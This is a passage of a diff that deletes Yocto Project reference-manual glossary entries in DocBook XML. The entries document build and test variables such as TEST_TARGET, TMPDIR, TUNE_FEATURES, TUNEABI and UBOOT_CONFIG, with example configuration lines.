-                    <link linkend='var-TEST_POWERCONTROL_CMD'><filename>TEST_POWERCONTROL_CMD</filename></link>.
-                    Setting <filename>TEST_POWERCONTROL_EXTRA_ARGS</filename>
-                    is optional.
-                    You can use it if you wish, for example, to separate the
-                    machine-specific and non-machine-specific parts of the
-                    arguments.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_QEMUBOOT_TIMEOUT'><glossterm>TEST_QEMUBOOT_TIMEOUT</glossterm>
-            <info>
-                TEST_QEMUBOOT_TIMEOUT[doc] = "The time in seconds allowed for an image to boot before automated runtime tests begin to run against an image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The time in seconds allowed for an image to boot before
-                    automated runtime tests begin to run against an
-                    image.
-                    The default timeout period to allow the boot process to
-                    reach the login prompt is 500 seconds.
-                    You can specify a different value in the
-                    <filename>local.conf</filename> file.
-                </para>
-
-                <para>
-                    For more information on testing images, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_SERIALCONTROL_CMD'><glossterm>TEST_SERIALCONTROL_CMD</glossterm>
-            <info>
-                TEST_SERIALCONTROL_CMD[doc] = "For automated hardware testing, specifies the command to use to connect to the serial console of the target machine under test."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For automated hardware testing, specifies the command
-                    to use to connect to the serial console of the target
-                    machine under test.
-                    This command simply needs to connect to the serial console
-                    and forward that connection to standard input and output
-                    as any normal terminal program does.
-                </para>
-
-                <para>
-                    For example, to use the Picocom terminal program on
-                    serial device <filename>/dev/ttyUSB0</filename> at
-                    115200bps, you would set the variable as follows:
-                    <literallayout class='monospaced'>
-     TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_SERIALCONTROL_EXTRA_ARGS'><glossterm>TEST_SERIALCONTROL_EXTRA_ARGS</glossterm>
-            <info>
-                TEST_SERIALCONTROL_EXTRA_ARGS[doc] = "For automated hardware testing, specifies additional arguments to pass through to the command specified in TEST_SERIALCONTROL_CMD."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For automated hardware testing, specifies additional
-                    arguments to pass through to the command specified in
-                    <link linkend='var-TEST_SERIALCONTROL_CMD'><filename>TEST_SERIALCONTROL_CMD</filename></link>.
-                    Setting <filename>TEST_SERIALCONTROL_EXTRA_ARGS</filename>
-                    is optional.
-                    You can use it if you wish, for example, to separate the
-                    machine-specific and non-machine-specific parts of the
-                    command.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_SERVER_IP'><glossterm>TEST_SERVER_IP</glossterm>
-            <info>
-                TEST_SERVER_IP[doc] = "The IP address of the build machine (host machine). This IP address is usually automatically detected."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The IP address of the build machine (host machine).
-                    This IP address is usually automatically detected.
-                    However, if detection fails, this variable needs to be set
-                    to the IP address of the build machine (i.e. where
-                    the build is taking place).
-                    <note>
-                        The <filename>TEST_SERVER_IP</filename> variable
-                        is only used for a small number of tests such as
-                        the "dnf" test suite, which needs to download
-                        packages from
-                        <filename>WORKDIR/oe-rootfs-repo</filename>.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_TARGET'><glossterm>TEST_TARGET</glossterm>
-            <info>
-                TEST_TARGET[doc] = "For automated runtime testing, specifies the method of deploying the image and running tests on the target machine."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the target controller to use when running tests
-                    against a test image.
-                    The default controller to use is "qemu":
-                    <literallayout class='monospaced'>
-     TEST_TARGET = "qemu"
-                    </literallayout>
-                </para>
-
-                <para>
-                    A target controller is a class that defines how an
-                    image gets deployed on a target and how a target is started.
-                    A layer can extend the controllers by adding a module
-                    in the layer's <filename>/lib/oeqa/controllers</filename>
-                    directory and by inheriting the
-                    <filename>BaseTarget</filename> class, which is an abstract
-                    class that cannot be used as a value of
-                    <filename>TEST_TARGET</filename>.
-                </para>
-
-                <para>
-                    You can provide the following arguments with
-                    <filename>TEST_TARGET</filename>:
-                    <itemizedlist>
-                        <listitem><para><emphasis>"qemu":</emphasis>
-                            Boots a QEMU image and runs the tests.
-                            See the
-                            "<ulink url='&YOCTO_DOCS_DEV_URL;#qemu-image-enabling-tests'>Enabling Runtime Tests on QEMU</ulink>"
-                            section in the Yocto Project Development Tasks
-                            Manual for more information.
-                            </para></listitem>
-                        <listitem><para><emphasis>"simpleremote":</emphasis>
-                            Runs the tests on target hardware that is already
-                            up and running.
-                            The hardware can be on the network or it can be
-                            a device running an image on QEMU.
-                            You must also set
-                            <link linkend='var-TEST_TARGET_IP'><filename>TEST_TARGET_IP</filename></link>
-                            when you use "simpleremote".
-                            <note>
-                                This argument is defined in
-                                <filename>meta/lib/oeqa/controllers/simpleremote.py</filename>.
-                            </note>
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    For information on running tests on hardware, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#hardware-image-enabling-tests'>Enabling Runtime Tests on Hardware</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_TARGET_IP'><glossterm>TEST_TARGET_IP</glossterm>
-            <info>
-                TEST_TARGET_IP[doc] = "The IP address of your hardware under test."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The IP address of your hardware under test.
-                    The <filename>TEST_TARGET_IP</filename> variable has no
-                    effect when
-                    <link linkend='var-TEST_TARGET'><filename>TEST_TARGET</filename></link>
-                    is set to "qemu".
-                </para>
-
-                <para>
-                    When you specify the IP address, you can also include a
-                    port.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     TEST_TARGET_IP = "192.168.1.4:2201"
-                    </literallayout>
-                    Specifying a port is useful when SSH is started on a
-                    non-standard port or in cases when your hardware under test
-                    is behind a firewall or network that is not directly
-                    accessible from your host and you need to do port address
-                    translation.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TEST_SUITES'><glossterm>TEST_SUITES</glossterm>
-            <info>
-                TEST_SUITES[doc] = "An ordered list of tests (modules) to run against an image when performing automated runtime testing."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    An ordered list of tests (modules) to run against
-                    an image when performing automated runtime testing.
-                </para>
-
-                <para>
-                    The OpenEmbedded build system provides a core set of tests
-                    that can be used against images.
-                    <note>
-                        Currently, there is only support for running these tests
-                        under QEMU.
-                    </note>
-                    Tests include <filename>ping</filename>,
-                    <filename>ssh</filename>, <filename>df</filename> among
-                    others.
-                    You can add your own tests to the list of tests by
-                    appending <filename>TEST_SUITES</filename> as follows:
-                    <literallayout class='monospaced'>
-     TEST_SUITES_append = " <replaceable>mytest</replaceable>"
-                    </literallayout>
-                    Alternatively, you can provide the "auto" option to
-                    have all applicable tests run against the image.
-                    <literallayout class='monospaced'>
-     TEST_SUITES_append = " auto"
-                    </literallayout>
-                    Using this option causes the build system to automatically
-                    run tests that are applicable to the image.
-                    Tests that are not applicable are skipped.
-                </para>
-
-                <para>
-                    The order in which tests are run is important.
-                    Tests that depend on another test must appear later in the
-                    list than the test on which they depend.
-                    For example, if you append the list of tests with two
-                    tests (<filename>test_A</filename> and
-                    <filename>test_B</filename>) where
-                    <filename>test_B</filename> is dependent on
-                    <filename>test_A</filename>, then you must order the tests
-                    as follows:
-                    <literallayout class='monospaced'>
-     TEST_SUITES = " test_A test_B"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For more information on testing images, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TESTIMAGE_AUTO'><glossterm>TESTIMAGE_AUTO</glossterm>
-            <info>
-                TESTIMAGE_AUTO[doc] = "Enables automatic testing of an image once it is built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Automatically runs the series of automated tests for
-                    images when an image is successfully built.
-                    Setting <filename>TESTIMAGE_AUTO</filename> to "1"
-                    causes any image that successfully builds to automatically
-                    boot under QEMU.
-                    Using the variable also adds in dependencies so that any
-                    SDK for which testing is requested is automatically built
-                    first.
-                </para>
-
-                <para>
-                    These tests are written in Python making use of the
-                    <filename>unittest</filename> module, and the majority of
-                    them run commands on the target system over
-                    <filename>ssh</filename>.
-                    You can set this variable to "1" in your
-                    <filename>local.conf</filename> file in the
-                    <link linkend='build-directory'>Build Directory</link>
-                    to have the OpenEmbedded build system automatically run
-                    these tests after an image successfully builds:
-                    <literallayout class='monospaced'>
-     TESTIMAGE_AUTO = "1"
-                    </literallayout>
-                    For more information on enabling, running, and writing
-                    these tests, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-                    section in the Yocto Project Development Tasks Manual and
-                    the
-                    "<link linkend='ref-classes-testimage*'><filename>testimage*.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-THISDIR'><glossterm>THISDIR</glossterm>
-            <info>
-                THISDIR[doc] = "The directory in which the file BitBake is currently parsing is located."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory in which the file BitBake is currently
-                    parsing is located.
-                    Do not manually set this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TIME'><glossterm>TIME</glossterm>
-            <info>
-                TIME[doc] = "The time the build was started using HMS format."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The time the build was started.
-                    Times appear using the hour, minute, and second (HMS)
-                    format (e.g. "140159" for one minute and fifty-nine
-                    seconds past 1400 hours).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TMPDIR'><glossterm>TMPDIR</glossterm>
-            <info>
-                TMPDIR[doc] = "The temporary directory the OpenEmbedded build system uses when it does its work building images. By default, the TMPDIR variable is named tmp within the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable is the base directory the OpenEmbedded
-                    build system uses for all build output and intermediate
-                    files (other than the shared state cache).
-                    By default, the <filename>TMPDIR</filename> variable points
-                    to <filename>tmp</filename> within the
-                    <link linkend='build-directory'>Build Directory</link>.
-                </para>
-
-                <para>
-                    If you want to establish this directory in a location other
-                    than the default, you can uncomment and edit the following
-                    statement in the
-                    <filename>conf/local.conf</filename> file in the
-                    <link linkend='source-directory'>Source Directory</link>:
-                    <literallayout class='monospaced'>
-     #TMPDIR = "${TOPDIR}/tmp"
-                    </literallayout>
-                    An example use for this scenario is to set
-                    <filename>TMPDIR</filename> to a local disk, which does
-                    not use NFS, while having the Build Directory use NFS.
-                </para>
-
-                <para>
-                    The filesystem used by <filename>TMPDIR</filename> must
-                    have standard filesystem semantics (i.e. mixed-case files
-                    are unique, POSIX file locking, and persistent inodes).
-                    Due to various issues with NFS and bugs in some
-                    implementations, NFS does not meet this minimum
-                    requirement.
-                    Consequently, <filename>TMPDIR</filename> cannot be on
-                    NFS.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TOOLCHAIN_HOST_TASK'><glossterm>TOOLCHAIN_HOST_TASK</glossterm>
-            <info>
-                TOOLCHAIN_HOST_TASK[doc] = "This variable lists packages the OpenEmbedded build system uses when building an SDK, which contains a cross-development environment."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable lists packages the OpenEmbedded build system
-                    uses when building an SDK, which contains a
-                    cross-development environment.
-                    The packages specified by this variable are part of the
-                    toolchain set that runs on the
-                    <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>,
-                    and each package should usually have the prefix
-                    <filename>nativesdk-</filename>.
-                    For example, consider the following command when
-                    building an SDK:
-                    <literallayout class='monospaced'>
-     $ bitbake -c populate_sdk <replaceable>imagename</replaceable>
-                    </literallayout>
-                    In this case, a default list of packages is set in this
-                    variable, but you can add additional packages to the list.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-adding-individual-packages'>Adding Individual Packages to the Standard SDK</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual
-                    for more information.
-                </para>
-
-                <para>
-                    For background information on cross-development toolchains
-                    in the Yocto Project development environment, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                    For information on setting up a cross-development
-                    environment, see the
-                    <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                    manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TOOLCHAIN_OUTPUTNAME'><glossterm>TOOLCHAIN_OUTPUTNAME</glossterm>
-            <info>
-                TOOLCHAIN_OUTPUTNAME[doc] = "Defines the name used for the toolchain output."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable defines the name used for the toolchain
-                    output.
-                    The
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
-                    class sets the
-                    <filename>TOOLCHAIN_OUTPUTNAME</filename> variable as
-                    follows:
-                    <literallayout class='monospaced'>
-     TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
-                    </literallayout>
-                    See the
-                    <link linkend='var-SDK_NAME'><filename>SDK_NAME</filename></link>
-                    and
-                    <link linkend='var-SDK_VERSION'><filename>SDK_VERSION</filename></link>
-                    variables for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TOOLCHAIN_TARGET_TASK'><glossterm>TOOLCHAIN_TARGET_TASK</glossterm>
-            <info>
-                TOOLCHAIN_TARGET_TASK[doc] = "This variable lists packages the OpenEmbedded build system uses when it creates the target part of an SDK, which includes libraries and headers."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable lists packages the OpenEmbedded build system
-                    uses when it creates the target part of an SDK
-                    (i.e. the part built for the target hardware), which
-                    includes libraries and headers.
-                    Use this variable to add individual packages to the
-                    part of the SDK that runs on the target.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-adding-individual-packages'>Adding Individual Packages to the Standard SDK</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual for
-                    more information.
-                </para>
-
-                <para>
-                    For background information on cross-development toolchains
-                    in the Yocto Project development environment, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                    For information on setting up a cross-development
-                    environment, see the
-                    <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                    manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TOPDIR'><glossterm>TOPDIR</glossterm>
-            <info>
-                TOPDIR[doc] = "The Build Directory. BitBake automatically sets this variable. The OpenEmbedded build system uses the Build Directory when building images."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The top-level
-                    <link linkend='build-directory'>Build Directory</link>.
-                    BitBake automatically sets this variable when you
-                    initialize your build environment using
-                    <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TRANSLATED_TARGET_ARCH'><glossterm>TRANSLATED_TARGET_ARCH</glossterm>
-            <info>
-                TRANSLATED_TARGET_ARCH[doc] = "A sanitized version of TARGET_ARCH. This variable is used where the architecture is needed in a value where underscores are not allowed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A sanitized version of
-                    <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>.
-                    This variable is used where the architecture is needed in
-                    a value where underscores are not allowed, for example
-                    within package filenames.
-                    In this case, dash characters replace any underscore
-                    characters used in <filename>TARGET_ARCH</filename>.
-                </para>
-
-                <para>
-                    Do not edit this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNE_ARCH'><glossterm>TUNE_ARCH</glossterm>
-            <info>
-                TUNE_ARCH[doc] = "The GNU canonical architecture for a specific architecture (i.e. arm, armeb, mips, mips64, and so forth)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The GNU canonical architecture for a specific architecture
-                    (i.e. <filename>arm</filename>,
-                    <filename>armeb</filename>,
-                    <filename>mips</filename>,
-                    <filename>mips64</filename>, and so forth).
-                    BitBake uses this value to setup configuration.
-                </para>
-
-                <para>
-                    <filename>TUNE_ARCH</filename> definitions are specific to
-                    a given architecture.
-                    The definitions can be a single static definition, or
-                    can be dynamically adjusted.
-                    You can see details for a given CPU family by looking at
-                    the architecture's <filename>README</filename> file.
-                    For example, the
-                    <filename>meta/conf/machine/include/mips/README</filename>
-                    file in the
-                    <link linkend='source-directory'>Source Directory</link>
-                    provides information for <filename>TUNE_ARCH</filename>
-                    specific to the <filename>mips</filename> architecture.
-                </para>
-
-                <para>
-                    <filename>TUNE_ARCH</filename> is tied closely to
-                    <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>,
-                    which defines the target machine's architecture.
-                    The BitBake configuration file
-                    (<filename>meta/conf/bitbake.conf</filename>) sets
-                    <filename>TARGET_ARCH</filename> as follows:
-                    <literallayout class='monospaced'>
-     TARGET_ARCH = "${TUNE_ARCH}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The following list, which is by no means complete since
-                    architectures are configurable, shows supported machine
-                    architectures:
-                    <literallayout class='monospaced'>
-     arm
-     i586
-     x86_64
-     powerpc
-     powerpc64
-     mips
-     mipsel
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNE_ASARGS'><glossterm>TUNE_ASARGS</glossterm>
-            <info>
-                TUNE_ASARGS[doc] = "Specifies architecture-specific assembler flags for the target system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific assembler flags for
-                    the target system.
-                    The set of flags is based on the selected tune features.
-                    <filename>TUNE_ASARGS</filename> is set using
-                    the tune include files, which are typically under
-                    <filename>meta/conf/machine/include/</filename> and are
-                    influenced through
-                    <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
-                    For example, the
-                    <filename>meta/conf/machine/include/x86/arch-x86.inc</filename>
-                    file defines the flags for the x86 architecture as follows:
-                    <literallayout class='monospaced'>
-     TUNE_ASARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-x32", "", d)}"
-                    </literallayout>
-                    <note>
-                        Board Support Packages (BSPs) select the tune.
-                        The selected tune, in turn, affects the tune variables
-                        themselves (i.e. the tune can supply its own
-                        set of flags).
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNE_CCARGS'><glossterm>TUNE_CCARGS</glossterm>
-            <info>
-                TUNE_CCARGS[doc] = "Specifies architecture-specific C compiler flags for the target system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific C compiler flags for
-                    the target system.
-                    The set of flags is based on the selected tune features.
-                    <filename>TUNE_CCARGS</filename> is set using
-                    the tune include files, which are typically under
-                    <filename>meta/conf/machine/include/</filename> and are
-                    influenced through
-                    <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
-                    <note>
-                        Board Support Packages (BSPs) select the tune.
-                        The selected tune, in turn, affects the tune variables
-                        themselves (i.e. the tune can supply its own
-                        set of flags).
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNE_LDARGS'><glossterm>TUNE_LDARGS</glossterm>
-            <info>
-                TUNE_LDARGS[doc] = "Specifies architecture-specific linker flags for the target system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific linker flags for
-                    the target system.
-                    The set of flags is based on the selected tune features.
-                    <filename>TUNE_LDARGS</filename> is set using
-                    the tune include files, which are typically under
-                    <filename>meta/conf/machine/include/</filename> and are
-                    influenced through
-                    <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
-                    For example, the
-                    <filename>meta/conf/machine/include/x86/arch-x86.inc</filename>
-                    file defines the flags for the x86 architecture as follows:
-                    <literallayout class='monospaced'>
-     TUNE_LDARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-m elf32_x86_64", "", d)}"
-                    </literallayout>
-                    <note>
-                        Board Support Packages (BSPs) select the tune.
-                        The selected tune, in turn, affects the tune variables
-                        themselves (i.e. the tune can supply its own
-                        set of flags).
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNE_FEATURES'><glossterm>TUNE_FEATURES</glossterm>
-            <info>
-                TUNE_FEATURES[doc] = "Features used to "tune" a compiler for optimal use given a specific processor."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Features used to "tune" a compiler for optimal use
-                    given a specific processor.
-                    The features are defined within the tune files and allow
-                    arguments (i.e. <filename>TUNE_*ARGS</filename>) to be
-                    dynamically generated based on the features.
-                </para>
-
-                <para>
-                    The OpenEmbedded build system verifies the features
-                    to be sure they are not conflicting and that they are
-                    supported.
-                </para>
-
-                <para>
-                    The BitBake configuration file
-                    (<filename>meta/conf/bitbake.conf</filename>) defines
-                    <filename>TUNE_FEATURES</filename> as follows:
-                    <literallayout class='monospaced'>
-     TUNE_FEATURES ??= "${TUNE_FEATURES_tune-${DEFAULTTUNE}}"
-                    </literallayout>
-                    See the
-                    <link linkend='var-DEFAULTTUNE'><filename>DEFAULTTUNE</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNE_PKGARCH'><glossterm>TUNE_PKGARCH</glossterm>
-            <info>
-                TUNE_PKGARCH[doc] = "The package architecture understood by the packaging system to define the architecture, ABI, and tuning of output packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The package architecture understood by the packaging
-                    system to define the architecture, ABI, and tuning of
-                    output packages.
-                    The specific tune is defined using the "_tune" override
-                    as follows:
-                    <literallayout class='monospaced'>
-     TUNE_PKGARCH_tune-<replaceable>tune</replaceable> = "<replaceable>tune</replaceable>"
-                    </literallayout>
-                </para>
-
-                <para>
-                    These tune-specific package architectures are defined in
-                    the machine include files.
-                    Here is an example of the "core2-32" tuning as used
-                    in the
-                    <filename>meta/conf/machine/include/tune-core2.inc</filename>
-                    file:
-                    <literallayout class='monospaced'>
-     TUNE_PKGARCH_tune-core2-32 = "core2-32"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNEABI'><glossterm>TUNEABI</glossterm>
-            <info>
-                TUNEABI[doc] = "An underlying ABI used by a particular tuning in a given toolchain layer. This feature allows providers using prebuilt libraries to check compatibility of a tuning against their selection of libraries."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    An underlying Application Binary Interface (ABI) used by
-                    a particular tuning in a given toolchain layer.
-                    Providers that use prebuilt libraries can use the
-                    <filename>TUNEABI</filename>,
-                    <link linkend='var-TUNEABI_OVERRIDE'><filename>TUNEABI_OVERRIDE</filename></link>,
-                    and
-                    <link linkend='var-TUNEABI_WHITELIST'><filename>TUNEABI_WHITELIST</filename></link>
-                    variables to check compatibility of tunings against their
-                    selection of libraries.
-                </para>
-
-                <para>
-                    If <filename>TUNEABI</filename> is undefined, then every
-                    tuning is allowed.
-                    See the
-                    <link linkend='ref-classes-sanity'><filename>sanity</filename></link>
-                    class to see how the variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNEABI_OVERRIDE'><glossterm>TUNEABI_OVERRIDE</glossterm>
-            <info>
-                TUNEABI_OVERRIDE[doc] = "If set, ignores TUNEABI_WHITELIST."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If set, the OpenEmbedded system ignores the
-                    <link linkend='var-TUNEABI_WHITELIST'><filename>TUNEABI_WHITELIST</filename></link>
-                    variable.
-                    Providers that use prebuilt libraries can use the
-                    <filename>TUNEABI_OVERRIDE</filename>,
-                    <filename>TUNEABI_WHITELIST</filename>,
-                    and
-                    <link linkend='var-TUNEABI'><filename>TUNEABI</filename></link>
-                    variables to check compatibility of a tuning against their
-                    selection of libraries.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='ref-classes-sanity'><filename>sanity</filename></link>
-                    class to see how the variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNEABI_WHITELIST'><glossterm>TUNEABI_WHITELIST</glossterm>
-            <info>
-                TUNEABI_WHITELIST[doc] = "A whitelist of permissible TUNEABI values.  If the variable is not set, all values are allowed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A whitelist of permissible
-                    <link linkend='var-TUNEABI'><filename>TUNEABI</filename></link>
-                    values.
-                    If <filename>TUNEABI_WHITELIST</filename> is not set,
-                    all tunes are allowed.
-                    Providers that use prebuilt libraries can use the
-                    <filename>TUNEABI_WHITELIST</filename>,
-                    <link linkend='var-TUNEABI_OVERRIDE'><filename>TUNEABI_OVERRIDE</filename></link>,
-                    and <filename>TUNEABI</filename> variables to check
-                    compatibility of a tuning against their selection of
-                    libraries.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='ref-classes-sanity'><filename>sanity</filename></link>
-                    class to see how the variable is used.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNECONFLICTS'><glossterm>TUNECONFLICTS[<replaceable>feature</replaceable>]</glossterm>
-            <info>
-                TUNECONFLICTS[doc] = "Specifies CPU or Application Binary Interface (ABI) tuning features that conflict with specified feature."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies CPU or Application Binary Interface (ABI)
-                    tuning features that conflict with <replaceable>feature</replaceable>.
-                </para>
-
-                <para>
-                    Known tuning conflicts are specified in the machine include
-                    files in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                    Here is an example from the
-                    <filename>meta/conf/machine/include/mips/arch-mips.inc</filename>
-                    include file that lists the "o32" and "n64" features as
-                    conflicting with the "n32" feature:
-                    <literallayout class='monospaced'>
-     TUNECONFLICTS[n32] = "o32 n64"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-TUNEVALID'><glossterm>TUNEVALID[<replaceable>feature</replaceable>]</glossterm>
-            <info>
-               TUNEVALID[doc] = "Descriptions, stored as flags, of valid tuning features."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a valid CPU or Application Binary Interface (ABI)
-                    tuning feature.
-                    The specified feature is stored as a flag.
-                    Valid features are specified in the machine include files
-                    (e.g. <filename>meta/conf/machine/include/arm/arch-arm.inc</filename>).
-                    Here is an example from that file:
-                    <literallayout class='monospaced'>
-     TUNEVALID[bigendian] = "Enable big-endian mode."
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the machine include files in the
-                    <link linkend='source-directory'>Source Directory</link>
-                    for these features.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-u'><title>U</title>
-
-        <glossentry id='var-UBOOT_CONFIG'><glossterm>UBOOT_CONFIG</glossterm>
-            <info>
-               UBOOT_CONFIG[doc] = "Configures the UBOOT_MACHINE and can also define IMAGE_FSTYPES for individual cases."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Configures the
-                    <link linkend='var-UBOOT_MACHINE'><filename>UBOOT_MACHINE</filename></link>
-                    and can also define
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    for individual cases.
-                </para>
-
-                <para>
-                    Following is an example from the
-                    <filename>meta-fsl-arm</filename> layer.
-                    <literallayout class='monospaced'>
-     UBOOT_CONFIG ??= "sd"
-     UBOOT_CONFIG[sd] = "mx6qsabreauto_config,sdcard"
-     UBOOT_CONFIG[eimnor] = "mx6qsabreauto_eimnor_config"
-     UBOOT_CONFIG[nand] = "mx6qsabreauto_nand_config,ubifs"
-     UBOOT_CONFIG[spinor] = "mx6qsabreauto_spinor_config"
-                    </literallayout>
-                    In this example, "sd" is selected as the configuration
-                    of the possible four for the
-                    <filename>UBOOT_MACHINE</filename>.
-                    The "sd" configuration defines "mx6qsabreauto_config"
-                    as the value for <filename>UBOOT_MACHINE</filename>, while
-                    the "sdcard" specifies the
-                    <filename>IMAGE_FSTYPES</filename> to use for the U-boot
-                    image.
-                </para>
-
-                <para>
-                    For more information on how the
-                    <filename>UBOOT_CONFIG</filename> is handled, see the
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/classes/uboot-config.bbclass'><filename>uboot-config</filename></ulink>
-                    class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UBOOT_ENTRYPOINT'><glossterm>UBOOT_ENTRYPOINT</glossterm>
-            <info>
-               UBOOT_ENTRYPOINT[doc] = "Specifies the entry point for the U-Boot image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the entry point for the U-Boot image.
-                    During U-Boot image creation, the
